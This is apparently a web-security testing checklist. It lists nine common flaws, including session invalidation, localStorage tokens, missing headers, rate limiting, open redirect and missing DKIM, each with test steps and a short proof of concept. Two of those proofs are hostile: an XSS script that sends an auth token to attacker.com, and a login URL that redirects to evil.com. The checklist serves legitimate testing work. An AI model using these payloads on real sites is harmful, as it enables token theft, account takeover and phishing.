Failure to Invalidate Session After Password Change
Description
When a user updates their password, all previously issued sessions should be invalidated. If this is not enforced, an attacker with a stolen or hijacked session token can continue using it even after the victim secures their account.
How to Test
Log into the application on two browsers simultaneously — capture the session token from the first browser and then change the account password from the second. If the first browser continues to operate normally without forcing re-authentication, the vulnerability is confirmed.
Proof of Concept
Demonstrate continued authenticated requests with the old token after the password change.
Business Impact
Attackers maintain access indefinitely, nullifying the victim’s attempt to secure their account.
Failure to Invalidate Sessions After Logout (Client + Server Side)
Description
Proper logout should terminate sessions server-side. If the application only clears tokens locally, captured tokens remain valid.
How to Test
Authenticate normally — capture the session token — log out using the UI — replay any authorized request using the old token. If the request still succeeds, the flaw exists.
Proof of Concept
Use Burp or Postman to send an API call with the old token post-logout.
Business Impact
Attackers who obtained tokens retain access even after a user logs out, exposing accounts to hijacking.
Sensitive Token Disclosure via Local Storage
Description
Storing sensitive authentication tokens in localStorage or sessionStorage exposes them to JavaScript and therefore to XSS attacks.
How to Test
Inspect the browser’s DevTools under the Application tab. If items such as authToken, jwt, or resetToken are present, attempt to reuse them in API requests.
Proof of Concept
<script>
fetch('https://attacker.com/steal?token=' + localStorage.getItem('authToken'));
</script>
Business Impact
Any XSS vulnerability escalates to full account takeover by exfiltrating sensitive tokens.
Lack of Security Headers on Sensitive Endpoints
Description
Critical endpoints should return essential security headers such as Content-Security-Policy, Strict-Transport-Security, X-Frame-Options, and X-Content-Type-Options. Their absence weakens client-side protections.
How to Test
Inspect HTTP responses of sensitive endpoints like /login or /account using Burp Suite or browser DevTools. If headers are missing or misconfigured, report accordingly.
Proof of Concept
Provide raw HTTP responses highlighting absent headers.
Business Impact
Users become exposed to clickjacking, MIME-type confusion, man-in-the-middle downgrades, and XSS.
No Password Policy
Description
Allowing weak or trivial passwords significantly reduces account security.
How to Test
Attempt to set common passwords such as 123456 or password. If accepted without rejection, there is no password policy enforcement.
Proof of Concept
Document account creation or update with a trivial password.
Business Impact
Facilitates brute-force attacks and compromises large numbers of user accounts.
No Rate Limiting on Login or Signup
Description
Lack of rate limiting enables automated credential stuffing and brute-force attempts.
How to Test
Send rapid repeated login attempts with Burp Intruder or a script. If the system accepts all attempts without lockouts, CAPTCHAs, or delays, the vulnerability exists.
Proof of Concept
Demonstrate dozens of valid requests processed within seconds.
Business Impact
Exposes all user accounts to large-scale automated attacks.
No Password Confirmation on Delete Account
Description
Account deletion should require password re-entry to prevent unauthorized or accidental deletions.
How to Test
Navigate to the account deletion page and observe whether re-entering the password is mandatory. If deletion occurs without confirmation, the flaw is present.
Proof of Concept
Show an account deletion request succeeding without password input.
Business Impact
Attackers with temporary access to an account can permanently delete it.
Open Redirect on Login Page
Description
Improper validation of redirect parameters (redirect, next) allows attackers to send users to malicious domains.
How to Test
Manipulate the redirect parameter in the login page, such as /login?next=https://evil.com. If authentication redirects to the attacker domain, the vulnerability is confirmed.
Proof of Concept
Example:
https://target.com/login?next=https://evil.com
Business Impact
Enables phishing campaigns, credential theft, and OAuth misuses.
Missing DKIM for Email
Description
DomainKeys Identified Mail (DKIM) is an essential standard for validating the authenticity of emails. If absent, emails appear easier to spoof.
How to Test
Send a legitimate email from the application to your account. Inspect the email headers in your inbox. If the DKIM-Signature field is missing, the domain does not sign emails.
Proof of Concept
Present raw headers showing SPF and DMARC but missing DKIM.
Business Impact
Attackers can forge legitimate-looking emails, enabling phishing and business email compromise (BEC) campaigns against users.
No comments yet